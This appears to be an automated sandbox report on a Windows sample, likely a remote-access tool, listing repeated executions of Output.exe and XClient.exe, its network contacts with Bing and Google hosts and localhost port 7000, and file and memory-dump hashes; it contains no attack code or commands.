C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/6060-0-0x00007FF8DB273000-0x00007FF8DB275000-memory.dmp
memory/6060-1-0x0000000000500000-0x0000000000556000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | e0918682feb10b28a39a9cfbf4d2d90c |
| SHA1 | c33f8518747e96955387bac3c8299eea24357fe0 |
| SHA256 | 8f7a69675281f0e5f2fd0b43c64434fdb132fdca1eb82cf23aa947f83c833d01 |
| SHA512 | dcb3961832197bf33b4e554a69b95a17c847fccde7211ca96ee0a9ad975a051f93e6f29a3a9525279b2aaf9d6b7208a8ddeb8c1d430e79ddf4155f5629038fa7 |
memory/4140-27-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/5432-30-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | 3ac2fbaa37549eb0c50eedbca0da41c2 |
| SHA1 | a486d241a02989d2adbff9785c7c39e68a2934af |
| SHA256 | 815021055de7349aafb51c6788bfd8f1a0f9fc242e842d6b8bf639283a4658fd |
| SHA512 | 76ac7165eba850a34e9dd459c538e1e0ceaee09896e711dabc1272c76a0a79b0826124cec4c43d626b390c222367af55b3de452312e51725f994d218cbe0e7f7 |
memory/5432-32-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/5432-26-0x00000000005A0000-0x00000000005E6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/4140-21-0x00000000006B0000-0x00000000006C2000-memory.dmp
memory/4140-90-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/4140-94-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp
memory/4140-93-0x00007FF8DB270000-0x00007FF8DBD31000-memory.dmp